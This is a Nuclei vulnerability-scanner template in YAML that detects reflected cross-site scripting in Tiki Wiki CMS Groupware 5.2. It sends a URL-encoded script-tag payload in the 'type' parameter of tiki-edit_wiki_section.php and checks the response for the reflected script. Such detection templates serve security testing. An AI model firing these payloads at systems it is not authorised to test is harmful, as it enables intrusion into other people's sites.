nuclei-templates/vulnerabilities/tikiwiki-reflected-xss.yaml

23 lines
593 B
YAML

id: tikiwiki-reflected-xss
info:
name: Tiki Wiki CMS Groupware 5.2 Reflected Cross-site Scripting
author: madrobot
severity: medium
description: todo
requests:
- method: GET
path:
- "{{BaseURL}}/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E"
- "{{BaseURL}}/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(31337)</script>"
part: body